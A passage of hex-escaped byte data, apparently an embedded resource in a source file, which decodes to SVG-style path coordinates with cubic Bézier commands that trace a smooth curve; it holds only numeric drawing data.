\x30\x39\x31\x30\x38\x37\x37\x37\x38\x20\x39\x2e\x31\x37\x30\x32\
\x30\x30\x34\x38\x36\x37\x36\x20\x31\x30\x2e\x31\x32\x33\x36\x37\
\x31\x34\x37\x33\x37\x20\x43\x20\x39\x2e\x31\x37\x36\x34\x34\x31\
\x35\x35\x35\x35\x39\x20\x31\x30\x2e\x31\x35\x36\x32\x35\x35\x31\
\x36\x39\x34\x20\x39\x2e\x31\x38\x32\x36\x38\x32\x36\x32\x34\x34\
\x33\x20\x31\x30\x2e\x31\x38\x39\x33\x36\x32\x39\x30\x36\x39\x20\
\x39\x2e\x31\x38\x38\x39\x32\x33\x36\x39\x33\x32\x37\x20\x31\x30\
\x2e\x32\x32\x32\x39\x36\x36\x30\x34\x33\x31\x20\x43\x20\x39\x2e\
\x31\x39\x35\x31\x36\x34\x37\x36\x32\x31\x20\x31\x30\x2e\x32\x35\
\x36\x35\x36\x39\x31\x37\x39\x32\x20\x39\x2e\x32\x30\x31\x34\x30\
\x35\x38\x33\x30\x39\x34\x20\x31\x30\x2e\x32\x39\x30\x36\x37\x30\
\x36\x39\x31\x37\x20\x39\x2e\x32\x30\x37\x36\x34\x36\x38\x39\x39\
\x37\x37\x20\x31\x30\x2e\x33\x32\x35\x32\x34\x31\x33\x32\x34\x39\
\x20\x43\x20\x39\x2e\x32\x31\x33\x38\x38\x37\x39\x36\x38\x36\x31\
\x20\x31\x30\x2e\x33\x35\x39\x38\x31\x31\x39\x35\x38\x31\x20\x39\
\x2e\x32\x32\x30\x31\x32\x39\x30\x33\x37\x34\x35\x20\x31\x30\x2e\
\x33\x39\x34\x38\x35\x34\x35\x33\x31\x37\x20\x39\x2e\x32\x32\x36\
\x33\x37\x30\x31\x30\x36\x32\x38\x20\x31\x30\x2e\x34\x33\x30\x33\
\x33\x39\x32\x32\x33\x31\x20\x43\x20\x39\x2e\x32\x33\x32\x36\x31\
\x31\x31\x37\x35\x31\x32\x20\x31\x30\x2e\x34\x36\x35\x38\x32\x33\
\x39\x31\x34\x35\x20\x39\x2e\x32\x33\x38\x38\x35\x32\x32\x34\x33\
\x39\x35\x20\x31\x30\x2e\x35\x30\x31\x37\x35\x33\x33\x38\x30\x38\
\x20\x39\x2e\x32\x34\x35\x30\x39\x33\x33\x31\x32\x37\x39\x20\x31\
\x30\x2e\x35\x33\x38\x30\x39\x37\x32\x37\x38\x35\x20\x43\x20\x39\
\x2e\x32\x35\x31\x33\x33\x34\x33\x38\x31\x36\x33\x20\x31\x30\x2e\
\x35\x37\x34\x34\x34\x31\x31\x37\x36\x32\x20\x39\x2e\x32\x35\x37\
\x35\x37\x35\x34\x35\x30\x34\x36\x20\x31\x30\x2e\x36\x31\x31\x32\
\x30\x31\x39\x39\x35\x39\x20\x39\x2e\x32\x36\x33\x38\x31\x36\x35\
\x31\x39\x33\x20\x31\x30\x2e\x36\x34\x38\x33\x34\x38\x39\x31\x39\
\x39\x20\x43\x20\x39\x2e\x32\x37\x30\x30\x35\x37\x35\x38\x38\x31\
\x34\x20\x31\x30\x2e\x36\x38\x35\x34\x39\x35\x38\x34\x34\x20\x39\
\x2e\x32\x37\x36\x32\x39\x38\x36\x35\x36\x39\x37\x20\x31\x30\x2e\
\x37\x32\x33\x30\x33\x31\x31\x39\x32\x34\x20\x39\x2e\x32\x38\x32\
\x35\x33\x39\x37\x32\x35\x38\x31\x20\x31\x30\x2e\x37\x36\x30\x39\
\x32\x33\x37\x32\x31\x35\x20\x43\x20\x39\x2e\x32\x38\x38\x37\x38\
\x30\x37\x39\x34\x36\x34\x20\x31\x30\x2e\x37\x39\x38\x38\x31\x36\
\x32\x35\x30\x35\x20\x39\x2e\x32\x39\x35\x30\x32\x31\x38\x36\x33\
\x34\x38\x20\x31\x30\x2e\x38\x33\x37\x30\x36\x38\x31\x30\x36\x31\
\x20\x39\x2e\x33\x30\x31\x32\x36\x32\x39\x33\x32\x33\x32\x20\x31\
\x30\x2e\x38\x37\x35\x36\x34\x37\x36\x36\x36\x34\x20\x43\x20\x39\
\x2e\x33\x30\x37\x35\x30\x34\x30\x30\x31\x31\x35\x20\x31\x30\x2e\
\x39\x31\x34\x32\x32\x37\x32\x32\x36\x36\x20\x39\x2e\x33\x31\x33\
\x37\x34\x35\x30\x36\x39\x39\x39\x20\x31\x30\x2e\x39\x35\x33\x31\
\x33\x36\x34\x36\x20\x39\x2e\x33\x31\x39\x39\x38\x36\x31\x33\x38\
\x38\x32\x20\x31\x30\x2e\x39\x39\x32\x33\x34\x33\x34\x31\x35\x35\
\x20\x43\x20\x39\x2e\x33\x32\x36\x32\x32\x37\x32\x30\x37\x36\x36\
\x20\x31\x31\x2e\x30\x33\x31\x35\x35\x30\x33\x37\x31\x20\x39\x2e\
\x33\x33\x32\x34\x36\x38\x32\x37\x36\x35\x20\x31\x31\x2e\x30\x37\
\x31\x30\x35\x36\x38\x33\x36\x38\x20\x39\x2e\x33\x33\x38\x37\x30\
\x39\x33\x34\x35\x33\x33\x20\x31\x31\x2e\x31\x31\x30\x38\x33\x30\
\x35\x38\x31\x39\x20\x43\x20\x39\x2e\x33\x34\x34\x39\x35\x30\x34\
\x31\x34\x31\x37\x20\x31\x31\x2e\x31\x35\x30\x36\x30\x34\x33\x32\
\x37\x20\x39\x2e\x33\x35\x31\x31\x39\x31\x34\x38\x33\x20\x31\x31\
\x2e\x31\x39\x30\x36\x34\x36\x39\x35\x36\x35\x20\x39\x2e\x33\x35\
\x37\x34\x33\x32\x35\x35\x31\x38\x34\x20\x31\x31\x2e\x32\x33\x30\
\x39\x32\x36\x30\x30\x39\x34\x20\x43\x20\x39\x2e\x33\x36\x33\x36\
\x37\x33\x36\x32\x30\x36\x38\x20\x31\x31\x2e\x32\x37\x31\x32\x30\
\x35\x30\x36\x32\x33\x20\x39\x2e\x33\x36\x39\x39\x31\x34\x36\x38\
\x39\x35\x31\x20\x31\x31\x2e\x33\x31\x31\x37\x32\x31\x39\x35\x38\
\x20\x39\x2e\x33\x37\x36\x31\x35\x35\x37\x35\x38\x33\x35\x20\x31\
\x31\x2e\x33\x35\x32\x34\x34\x34\x30\x35\x35\x38\x20\x43\x20\x39\
\x2e\x33\x38\x32\x33\x39\x36\x38\x32\x37\x31\x38\x20\x31\x31\x2e\
\x33\x39\x33\x31\x36\x36\x31\x35\x33\x36\x20\x39\x2e\x33\x38\x38\
\x36\x33\x37\x38\x39\x36\x30\x32\x20\x31\x31\x2e\x34\x33\x34\x30\
\x39\x34\x36\x38\x34\x39\x20\x39\x2e\x33\x39\x34\x38\x37\x38\x39\
\x36\x34\x38\x36\x20\x31\x31\x2e\x34\x37\x35\x31\x39\x36\x38\x37\
\x39\x38\x20\x43\x20\x39\x2e\x34\x30\x31\x31\x32\x30\x30\x33\x33\
\x36\x39\x20\x31\x31\x2e\x35\x31\x36\x32\x39\x39\x30\x37\x34\x37\
\x20\x39\x2e\x34\x30\x37\x33\x36\x31\x31\x30\x32\x35\x33\x20\x31\
\x31\x2e\x35\x35\x37\x35\x37\x35\x39\x37\x34\x38\x20\x39\x2e\x34\
\x31\x33\x36\x30\x32\x31\x37\x31\x33\x36\x20\x31\x31\x2e\x35\x39\
\x38\x39\x39\x34\x37\x33\x31\x35\x20\x43\x20\x39\x2e\x34\x31\x39\
\x38\x34\x33\x32\x34\x30\x32\x20\x31\x31\x2e\x36\x34\x30\x34\x31\
\x33\x34\x38\x38\x31\x20\x39\x2e\x34\x32\x36\x30\x38\x34\x33\x30\
\x39\x30\x34\x20\x31\x31\x2e\x36\x38\x31\x39\x37\x34\x39\x35\x31\
\x36\x20\x39\x2e\x34\x33\x32\x33\x32\x35\x33\x37\x37\x38\x37\x20\
\x31\x31\x2e\x37\x32\x33\x36\x34\x36\x32\x34\x35\x34\x20\x43\x20\
\x39\x2e\x34\x33\x38\x35\x36\x36\x34\x34\x36\x37\x31\x20\x31\x31\
\x2e\x37\x36\x35\x33\x31\x37\x35\x33\x39\x32\x20\x39\x2e\x34\x34\
\x34\x38\x30\x37\x35\x31\x35\x35\x34\x20\x31\x31\x2e\x38\x30\x37\
\x30\x39\x39\x33\x32\x30\x38\x20\x39\x2e\x34\x35\x31\x30\x34\x38\
\x35\x38\x34\x33\x38\x20\x31\x31\x2e\x38\x34\x38\x39\x35\x38\x37\
\x33\x36\x37\x20\x43\x20\x39\x2e\x34\x35\x37\x32\x38\x39\x36\x35\
\x33\x32\x32\x20\x31\x31\x2e\x38\x39\x30\x38\x31\x38\x31\x35\x32\
\x35\x20\x39\x2e\x34\x36\x33\x35\x33\x30\x37\x32\x32\x30\x35\x20\
\x31\x31\x2e\x39\x33\x32\x37\x35\x35\x36\x36\x36\x35\x20\x39\x2e\
\x34\x36\x39\x37\x37\x31\x37\x39\x30\x38\x39\x20\x31\x31\x2e\x39\
\x37\x34\x37\x33\x38\x34\x39\x38\x36\x20\x43\x20\x39\x2e\x34\x37\
\x36\x30\x31\x32\x38\x35\x39\x37\x32\x20\x31\x32\x2e\x30\x31\x36\
\x37\x32\x31\x33\x33\x30\x37\x20\x39\x2e\x34\x38\x32\x32\x35\x33\
\x39\x32\x38\x35\x36\x20\x31\x32\x2e\x30\x35\x38\x37\x34\x39\x37\
\x35\x30\x34\x20\x39\x2e\x34\x38\x38\x34\x39\x34\x39\x39\x37\x34\
\x20\x31\x32\x2e\x31\x30\x30\x37\x39\x31\x31\x30\x32\x32\x20\x43\
\x20\x39\x2e\x34\x39\x34\x37\x33\x36\x30\x36\x36\x32\x33\x20\x31\
\x32\x2e\x31\x34\x32\x38\x33\x32\x34\x35\x33\x39\x20\x39\x2e\x35\
\x30\x30\x39\x37\x37\x31\x33\x35\x30\x37\x20\x31\x32\x2e\x31\x38\
\x34\x38\x38\x36\x38\x31\x32\x34\x20\x39\x2e\x35\x30\x37\x32\x31\
\x38\x32\x30\x33\x39\x20\x31\x32\x2e\x32\x32\x36\x39\x32\x31\x36\
\x39\x36\x37\x20\x43\x20\x39\x2e\x35\x31\x33\x34\x35\x39\x32\x37\
\x32\x37\x34\x20\x31\x32\x2e\x32\x36\x38\x39\x35\x36\x35\x38\x31\
\x20\x39\x2e\x35\x31\x39\x37\x30\x30\x33\x34\x31\x35\x38\x20\x31\
\x32\x2e\x33\x31\x30\x39\x37\x31\x38\x37\x31\x20\x39\x2e\x35\x32\
\x35\x39\x34\x31\x34\x31\x30\x34\x31\x20\x31\x32\x2e\x33\x35\x32\
\x39\x33\x35\x33\x31\x30\x38\x20\x43\x20\x39\x2e\x35\x33\x32\x31\
\x38\x32\x34\x37\x39\x32\x35\x20\x31\x32\x2e\x33\x39\x34\x38\x39\
\x38\x37\x35\x30\x37\x20\x39\x2e\x35\x33\x38\x34\x32\x33\x35\x34\
\x38\x30\x39\x20\x31\x32\x2e\x34\x33\x36\x38\x31\x30\x30\x32\x35\
\x34\x20\x39\x2e\x35\x34\x34\x36\x36\x34\x36\x31\x36\x39\x32\x20\
\x31\x32\x2e\x34\x37\x38\x36\x33\x37\x31\x35\x34\x32\x20\x43\x20\
\x39\x2e\x35\x35\x30\x39\x30\x35\x36\x38\x35\x37\x36\x20\x31\x32\
\x2e\x35\x32\x30\x34\x36\x34\x32\x38\x32\x39\x20\x39\x2e\x35\x35\
\x37\x31\x34\x36\x37\x35\x34\x35\x39\x20\x31\x32\x2e\x35\x36\x32\
\x32\x30\x36\x37\x35\x36\x34\x20\x39\x2e\x35\x36\x33\x33\x38\x37\
\x38\x32\x33\x34\x33\x20\x31\x32\x2e\x36\x30\x33\x38\x33\x32\x39\
\x31\x38\x31\x20\x43\x20\x39\x2e\x35\x36\x39\x36\x32\x38\x38\x39\
\x32\x32\x37\x20\x31\x32\x2e\x36\x34\x35\x34\x35\x39\x30\x37\x39\
\x38\x20\x39\x2e\x35\x37\x35\x38\x36\x39\x39\x36\x31\x31\x20\x31\
\x32\x2e\x36\x38\x36\x39\x36\x38\x32\x32\x37\x20\x39\x2e\x35\x38\
\x32\x31\x31\x31\x30\x32\x39\x39\x34\x20\x31\x32\x2e\x37\x32\x38\
\x33\x32\x39\x30\x37\x36\x34\x20\x43\x20\x39\x2e\x35\x38\x38\x33\
\x35\x32\x30\x39\x38\x37\x37\x20\x31\x32\x2e\x37\x36\x39\x36\x38\
\x39\x39\x32\x35\x39\x20\x39\x2e\x35\x39\x34\x35\x39\x33\x31\x36\
\x37\x36\x31\x20\x31\x32\x2e\x38\x31\x30\x39\x30\x31\x35\x38\x32\
\x33\x20\x39\x2e\x36\x30\x30\x38\x33\x34\x32\x33\x36\x34\x35\x20\
\x31\x32\x2e\x38\x35\x31\x39\x33\x33\x31\x38\x34\x33\x20\x43\x20\
\x39\x2e\x36\x30\x37\x30\x37\x35\x33\x30\x35\x32\x38\x20\x31\x32\
\x2e\x38\x39\x32\x39\x36\x34\x37\x38\x36\x33\x20\x39\x2e\x36\x31\
\x33\x33\x31\x36\x33\x37\x34\x31\x32\x20\x31\x32\x2e\x39\x33\x33\
\x38\x31\x35\x32\x34\x37\x36\x20\x39\x2e\x36\x31\x39\x35\x35\x37\
\x34\x34\x32\x39\x35\x20\x31\x32\x2e\x39\x37\x34\x34\x35\x34\x31\
\x37\x35\x39\x20\x43\x20\x39\x2e\x36\x32\x35\x37\x39\x38\x35\x31\
\x31\x37\x39\x20\x31\x33\x2e\x30\x31\x35\x30\x39\x33\x31\x30\x34\
\x33\x20\x39\x2e\x36\x33\x32\x30\x33\x39\x35\x38\x30\x36\x33\x20\
\x31\x33\x2e\x30\x35\x35\x35\x31\x39\x32\x32\x34\x32\x20\x39\x2e\
\x36\x33\x38\x32\x38\x30\x36\x34\x39\x34\x36\x20\x31\x33\x2e\x30\
\x39\x35\x37\x30\x32\x36\x35\x39\x36\x20\x43\x20\x39\x2e\x36\x34\
\x34\x35\x32\x31\x37\x31\x38\x33\x20\x31\x33\x2e\x31\x33\x35\x38\
\x38\x36\x30\x39\x35\x31\x20\x39\x2e\x36\x35\x30\x37\x36\x32\x37\
\x38\x37\x31\x33\x20\x31\x33\x2e\x31\x37\x35\x38\x32\x35\x33\x38\
\x33\x33\x20\x39\x2e\x36\x35\x37\x30\x30\x33\x38\x35\x35\x39\x37\
\x20\x31\x33\x2e\x32\x31\x35\x34\x39\x31\x32\x31\x30\x39\x20\x43\
\x20\x39\x2e\x36\x36\x33\x32\x34\x34\x39\x32\x34\x38\x31\x20\x31\
\x33\x2e\x32\x35\x35\x31\x35\x37\x30\x33\x38\x34\x20\x39\x2e\x36\
\x36\x39\x34\x38\x35\x39\x39\x33\x36\x34\x20\x31\x33\x2e\x32\x39\
\x34\x35\x34\x37\x37\x35\x37\x32\x20\x39\x2e\x36\x37\x35\x37\x32\
\x37\x30\x36\x32\x34\x38\x20\x31\x33\x2e\x33\x33\x33\x36\x33\x34\
\x36\x36\x31\x37\x20\x43\x20\x39\x2e\x36\x38\x31\x39\x36\x38\x31\
\x33\x31\x33\x31\x20\x31\x33\x2e\x33\x37\x32\x37\x32\x31\x35\x36\
\x36\x33\x20\x39\x2e\x36\x38\x38\x32\x30\x39\x32\x30\x30\x31\x35\
\x20\x31\x33\x2e\x34\x31\x31\x35\x30\x32\x38\x32\x36\x20\x39\x2e\
\x36\x39\x34\x34\x35\x30\x32\x36\x38\x39\x39\x20\x31\x33\x2e\x34\
\x34\x39\x39\x35\x30\x33\x38\x37\x35\x20\x43\x20\x39\x2e\x37\x30\
\x30\x36\x39\x31\x33\x33\x37\x38\x32\x20\x31\x33\x2e\x34\x38\x38\
\x33\x39\x37\x39\x34\x38\x39\x20\x39\x2e\x37\x30\x36\x39\x33\x32\
\x34\x30\x36\x36\x36\x20\x31\x33\x2e\x35\x32\x36\x35\x30\x39\x38\
\x30\x31\x38\x20\x39\x2e\x37\x31\x33\x31\x37\x33\x34\x37\x35\x34\
\x39\x20\x31\x33\x2e\x35\x36\x34\x32\x35\x38\x35\x38\x38\x34\x20\
\x43\x20\x39\x2e\x37\x31\x39\x34\x31\x34\x35\x34\x34\x33\x33\x20\
\x31\x33\x2e\x36\x30\x32\x30\x30\x37\x33\x37\x34\x39\x20\x39\x2e\
\x37\x32\x35\x36\x35\x35\x36\x31\x33\x31\x37\x20\x31\x33\x2e\x36\
\x33\x39\x33\x39\x30\x39\x30\x38\x32\x20\x39\x2e\x37\x33\x31\x38\
\x39\x36\x36\x38\x32\x20\x31\x33\x2e\x36\x37\x36\x33\x38\x32\x35\
\x36\x38\x32\x20\x43\x20\x39\x2e\x37\x33\x38\x31\x33\x37\x37\x35\
\x30\x38\x34\x20\x31\x33\x2e\x37\x31\x33\x33\x37\x34\x32\x32\x38\
\x32\x20\x39\x2e\x37\x34\x34\x33\x37\x38\x38\x31\x39\x36\x37\x20\
\x31\x33\x2e\x37\x34\x39\x39\x37\x31\x36\x35\x34\x38\x20\x39\x2e\
\x37\x35\x30\x36\x31\x39\x38\x38\x38\x35\x31\x20\x31\x33\x2e\x37\
\x38\x36\x31\x34\x39\x30\x30\x36\x39\x20\x43\x20\x39\x2e\x37\x35\
\x36\x38\x36\x30\x39\x35\x37\x33\x35\x20\x31\x33\x2e\x38\x32\x32\
\x33\x32\x36\x33\x35\x39\x20\x39\x2e\x37\x36\x33\x31\x30\x32\x30\
\x32\x36\x31\x38\x20\x31\x33\x2e\x38\x35\x38\x30\x38\x31\x31\x30\
\x36\x39\x20\x39\x2e\x37\x36\x39\x33\x34\x33\x30\x39\x35\x30\x32\
\x20\x31\x33\x2e\x38\x39\x33\x33\x38\x38\x32\x32\x38\x36\x20\x43\
\x20\x39\x2e\x37\x37\x35\x35\x38\x34\x31\x36\x33\x38\x35\x20\x31\
\x33\x2e\x39\x32\x38\x36\x39\x35\x33\x35\x30\x33\x20\x39\x2e\x37\
\x38\x31\x38\x32\x35\x32\x33\x32\x36\x39\x20\x31\x33\x2e\x39\x36\
\x33\x35\x35\x32\x31\x35\x30\x33\x20\x39\x2e\x37\x38\x38\x30\x36\
\x36\x33\x30\x31\x35\x33\x20\x31\x33\x2e\x39\x39\x37\x39\x33\x34\
\x34\x36\x34\x32\x20\x43\x20\x39\x2e\x37\x39\x34\x33\x30\x37\x33\
\x37\x30\x33\x36\x20\x31\x34\x2e\x30\x33\x32\x33\x31\x36\x37\x37\
\x38\x31\x20\x39\x2e\x38\x30\x30\x35\x34\x38\x34\x33\x39\x32\x20\
\x31\x34\x2e\x30\x36\x36\x32\x32\x31\x37\x34\x39\x20\x39\x2e\x38\
\x30\x36\x37\x38\x39\x35\x30\x38\x30\x34\x20\x31\x34\x2e\x30\x39\
\x39\x36\x32\x36\x31\x30\x37\x33\x20\x43\x20\x39\x2e\x38\x31\x33\
\x30\x33\x30\x35\x37\x36\x38\x37\x20\x31\x34\x2e\x31\x33\x33\x30\
\x33\x30\x34\x36\x35\x36\x20\x39\x2e\x38\x31\x39\x32\x37\x31\x36\
\x34\x35\x37\x31\x20\x31\x34\x2e\x31\x36\x35\x39\x33\x31\x31\x39\
\x37\x33\x20\x39\x2e\x38\x32\x35\x35\x31\x32\x37\x31\x34\x35\x34\
\x20\x31\x34\x2e\x31\x39\x38\x33\x30\x35\x39\x36\x34\x20\x43\x20\
\x39\x2e\x38\x33\x31\x37\x35\x33\x37\x38\x33\x33\x38\x20\x31\x34\
\x2e\x32\x33\x30\x36\x38\x30\x37\x33\x30\x36\x20\x39\x2e\x38\x33\
\x37\x39\x39\x34\x38\x35\x32\x32\x32\x20\x31\x34\x2e\x32\x36\x32\
\x35\x32\x36\x33\x36\x35\x36\x20\x39\x2e\x38\x34\x34\x32\x33\x35\
\x39\x32\x31\x30\x35\x20\x31\x34\x2e\x32\x39\x33\x38\x32\x31\x34\
\x39\x36\x20\x43\x20\x39\x2e\x38\x35\x30\x34\x37\x36\x39\x38\x39\
\x38\x39\x20\x31\x34\x2e\x33\x32\x35\x31\x31\x36\x36\x32\x36\x33\
\x20\x39\x2e\x38\x35\x36\x37\x31\x38\x30\x35\x38\x37\x32\x20\x31\
\x34\x2e\x33\x35\x35\x38\x35\x37\x39\x33\x38\x20\x39\x2e\x38\x36\
\x32\x39\x35\x39\x31\x32\x37\x35\x36\x20\x31\x34\x2e\x33\x38\x36\
\x30\x32\x35\x30\x35\x36\x35\x20\x43\x20\x39\x2e\x38\x36\x39\x32\
\x30\x30\x31\x39\x36\x34\x20\x31\x34\x2e\x34\x31\x36\x31\x39\x32\
\x31\x37\x34\x39\x20\x39\x2e\x38\x37\x35\x34\x34\x31\x32\x36\x35\
\x32\x33\x20\x31\x34\x2e\x34\x34\x35\x37\x38\x31\x36\x34\x33\x37\
\x20\x39\x2e\x38\x38\x31\x36\x38\x32\x33\x33\x34\x30\x37\x20\x31\
\x34\x2e\x34\x37\x34\x37\x37\x34\x31\x31\x38\x33\x20\x43\x20\x39\
\x2e\x38\x38\x37\x39\x32\x33\x34\x30\x32\x39\x20\x31\x34\x2e\x35\
\x30\x33\x37\x36\x36\x35\x39\x32\x38\x20\x39\x2e\x38\x39\x34\x31\
\x36\x34\x34\x37\x31\x37\x34\x20\x31\x34\x2e\x35\x33\x32\x31\x35\
\x38\x34\x37\x39\x36\x20\x39\x2e\x39\x30\x30\x34\x30\x35\x35\x34\
\x30\x35\x38\x20\x31\x34\x2e\x35\x35\x39\x39\x33\x31\x34\x39\x33\
\x39\x20\x43\x20\x39\x2e\x39\x30\x36\x36\x34\x36\x36\x30\x39\x34\
\x31\x20\x31\x34\x2e\x35\x38\x37\x37\x30\x34\x35\x30\x38\x33\x20\
\x39\x2e\x39\x31\x32\x38\x38\x37\x36\x37\x38\x32\x35\x20\x31\x34\
\x2e\x36\x31\x34\x38\x35\x34\x39\x32\x35\x32\x20\x39\x2e\x39\x31\
\x39\x31\x32\x38\x37\x34\x37\x30\x38\x20\x31\x34\x2e\x36\x34\x31\
\x33\x36\x35\x35\x34\x38\x32\x20\x43\x20\x39\x2e\x39\x32\x35\x33\
\x36\x39\x38\x31\x35\x39\x32\x20\x31\x34\x2e\x36\x36\x37\x38\x37\
\x36\x31\x37\x31\x31\x20\x39\x2e\x39\x33\x31\x36\x31\x30\x38\x38\
\x34\x37\x36\x20\x31\x34\x2e\x36\x39\x33\x37\x34\x33\x31\x34\x39\
\x33\x20\x39\x2e\x39\x33\x37\x38\x35\x31\x39\x35\x33\x35\x39\x20\
\x31\x34\x2e\x37\x31\x38\x39\x35\x30\x34\x30\x31\x31\x20\x43\x20\
\x39\x2e\x39\x34\x34\x30\x39\x33\x30\x32\x32\x34\x33\x20\x31\x34\
\x2e\x37\x34\x34\x31\x35\x37\x36\x35\x32\x38\x20\x39\x2e\x39\x35\
\x30\x33\x33\x34\x30\x39\x31\x32\x36\x20\x31\x34\x2e\x37\x36\x38\
\x37\x30\x31\x32\x30\x37\x35\x20\x39\x2e\x39\x35\x36\x35\x37\x35\
\x31\x36\x30\x31\x20\x31\x34\x2e\x37\x39\x32\x35\x36\x36\x31\x32\
\x32\x39\x20\x43\x20\x39\x2e\x39\x36\x32\x38\x31\x36\x32\x32\x38\
\x39\x34\x20\x31\x34\x2e\x38\x31\x36\x34\x33\x31\x30\x33\x38\x33\
\x20\x39\x2e\x39\x36\x39\x30\x35\x37\x32\x39\x37\x37\x37\x20\x31\
\x34\x2e\x38\x33\x39\x36\x31\x33\x32\x33\x30\x32\x20\x39\x2e\x39\
\x37\x35\x32\x39\x38\x33\x36\x36\x36\x31\x20\x31\x34\x2e\x38\x36\
\x32\x30\x39\x38\x39\x31\x39\x32\x20\x43\x20\x39\x2e\x39\x38\x31\
\x35\x33\x39\x34\x33\x35\x34\x34\x20\x31\x34\x2e\x38\x38\x34\x35\
\x38\x34\x36\x30\x38\x32\x20\x39\x2e\x39\x38\x37\x37\x38\x30\x35\
\x30\x34\x32\x38\x20\x31\x34\x2e\x39\x30\x36\x33\x36\x39\x36\x30\
\x32\x36\x20\x39\x2e\x39\x39\x34\x30\x32\x31\x35\x37\x33\x31\x32\
\x20\x31\x34\x2e\x39\x32\x37\x34\x34\x31\x33\x30\x37\x20\x43\x20\
\x31\x30\x2e\x30\x30\x30\x32\x36\x32\x36\x34\x32\x20\x31\x34\x2e\
\x39\x34\x38\x35\x31\x33\x30\x31\x31\x33\x20\x31\x30\x2e\x30\x30\
\x36\x35\x30\x33\x37\x31\x30\x38\x20\x31\x34\x2e\x39\x36\x38\x38\
\x36\x37\x31\x33\x33\x32\x20\x31\x30\x2e\x30\x31\x32\x37\x34\x34\
\x37\x37\x39\x36\x20\x31\x34\x2e\x39\x38\x38\x34\x39\x32\x32\x38\
\x30\x36\x20\x43\x20\x31\x30\x2e\x30\x31\x38\x39\x38\x35\x38\x34\
\x38\x35\x20\x31\x35\x2e\x30\x30\x38\x31\x31\x37\x34\x32\x38\x20\
\x31\x30\x2e\x30\x32\x35\x32\x32\x36\x39\x31\x37\x33\x20\x31\x35\
\x2e\x30\x32\x37\x30\x30\x39\x32\x31\x34\x32\x20\x31\x30\x2e\x30\
\x33\x31\x34\x36\x37\x39\x38\x36\x31\x20\x31\x35\x2e\x30\x34\x35\
\x31\x35\x37\x34\x36\x38\x33\x20\x43\x20\x31\x30\x2e\x30\x33\x37\
\x37\x30\x39\x30\x35\x35\x20\x31\x35\x2e\x30\x36\x33\x33\x30\x35\
\x37\x32\x32\x34\x20\x31\x30\x2e\x30\x34\x33\x39\x35\x30\x31\x32\
\x33\x38\x20\x31\x35\x2e\x30\x38\x30\x37\x30\x35\x39\x37\x30\x31\
\x20\x31\x30\x2e\x30\x35\x30\x31\x39\x31\x31\x39\x32\x36\x20\x31\
\x35\x2e\x30\x39\x37\x33\x34\x39\x32\x37\x37\x35\x20\x43\x20\x31\
\x30\x2e\x30\x35\x36\x34\x33\x32\x32\x36\x31\x35\x20\x31\x35\x2e\
\x31\x31\x33\x39\x39\x32\x35\x38\x34\x39\x20\x31\x30\x2e\x30\x36\
\x32\x36\x37\x33\x33\x33\x30\x33\x20\x31\x35\x2e\x31\x32\x39\x38\
\x37\x34\x33\x39\x37\x31\x20\x31\x30\x2e\x30\x36\x38\x39\x31\x34\
\x33\x39\x39\x31\x20\x31\x35\x2e\x31\x34\x34\x39\x38\x37\x30\x33\
\x30\x37\x20\x43\x20\x31\x30\x2e\x30\x37\x35\x31\x35\x35\x34\x36\
\x38\x20\x31\x35\x2e\x31\x36\x30\x30\x39\x39\x36\x36\x34\x34\x20\
\x31\x30\x2e\x30\x38\x31\x33\x39\x36\x35\x33\x36\x38\x20\x31\x35\
\x2e\x31\x37\x34\x34\x33\x38\x34\x39\x31\x31\x20\x31\x30\x2e\x30\
\x38\x37\x36\x33\x37\x36\x30\x35\x37\x20\x31\x35\x2e\x31\x38\x37\
\x39\x39\x37\x30\x39\x30\x31\x20\x43\x20\x31\x30\x2e\x30\x39\x33\
\x38\x37\x38\x36\x37\x34\x35\x20\x31\x35\x2e\x32\x30\x31\x35\x35\
\x35\x36\x38\x39\x20\x31\x30\x2e\x31\x30\x30\x31\x31\x39\x37\x34\
\x33\x33\x20\x31\x35\x2e\x32\x31\x34\x33\x32\x39\x33\x36\x35\x35\
\x20\x31\x30\x2e\x31\x30\x36\x33\x36\x30\x38\x31\x32\x32\x20\x31\
\x35\x2e\x32\x32\x36\x33\x31\x32\x39\x37\x31\x20\x43\x20\x31\x30\
\x2e\x31\x31\x32\x36\x30\x31\x38\x38\x31\x20\x31\x35\x2e\x32\x33\
\x38\x32\x39\x36\x35\x37\x36\x36\x20\x31\x30\x2e\x31\x31\x38\x38\
\x34\x32\x39\x34\x39\x38\x20\x31\x35\x2e\x32\x34\x39\x34\x38\x35\
\x33\x35\x37\x34\x20\x31\x30\x2e\x31\x32\x35\x30\x38\x34\x30\x31\
\x38\x37\x20\x31\x35\x2e\x32\x35\x39\x38\x37\x35\x34\x34\x35\x34\
\x20\x43\x20\x31\x30\x2e\x31\x33\x31\x33\x32\x35\x30\x38\x37\x35\
\x20\x31\x35\x2e\x32\x37\x30\x32\x36\x35\x35\x33\x33\x34\x20\x31\
\x30\x2e\x31\x33\x37\x35\x36\x36\x31\x35\x36\x33\x20\x31\x35\x2e\
\x32\x37\x39\x38\x35\x32\x31\x32\x33\x20\x31\x30\x2e\x31\x34\x33\
\x38\x30\x37\x32\x32\x35\x32\x20\x31\x35\x2e\x32\x38\x38\x36\x33\
\x32\x36\x33\x32\x36\x20\x43\x20\x31\x30\x2e\x31\x35\x30\x30\x34\
\x38\x32\x39\x34\x20\x31\x35\x2e\x32\x39\x37\x34\x31\x33\x31\x34\
\x32\x31\x20\x31\x30\x2e\x31\x35\x36\x32\x38\x39\x33\x36\x32\x39\
\x20\x31\x35\x2e\x33\x30\x35\x33\x38\x32\x37\x32\x31\x37\x20\x31\
\x30\x2e\x31\x36\x32\x35\x33\x30\x34\x33\x31\x37\x20\x31\x35\x2e\
\x33\x31\x32\x35\x34\x30\x30\x38\x20\x43\x20\x31\x30\x2e\x31\x36\
\x38\x37\x37\x31\x35\x30\x30\x35\x20\x31\x35\x2e\x33\x31\x39\x36\
\x39\x37\x34\x33\x38\x33\x20\x31\x30\x2e\x31\x37\x35\x30\x31\x32\
\x35\x36\x39\x34\x20\x31\x35\x2e\x33\x32\x36\x30\x33\x37\x36\x38\
\x38\x37\x20\x31\x30\x2e\x31\x38\x31\x32\x35\x33\x36\x33\x38\x32\
\x20\x31\x35\x2e\x33\x33\x31\x35\x36\x30\x38\x33\x32\x20\x43\x20\
\x31\x30\x2e\x31\x38\x37\x34\x39\x34\x37\x30\x37\x20\x31\x35\x2e\
\x33\x33\x37\x30\x38\x33\x39\x37\x35\x32\x20\x31\x30\x2e\x31\x39\
\x33\x37\x33\x35\x37\x37\x35\x39\x20\x31\x35\x2e\x33\x34\x31\x37\
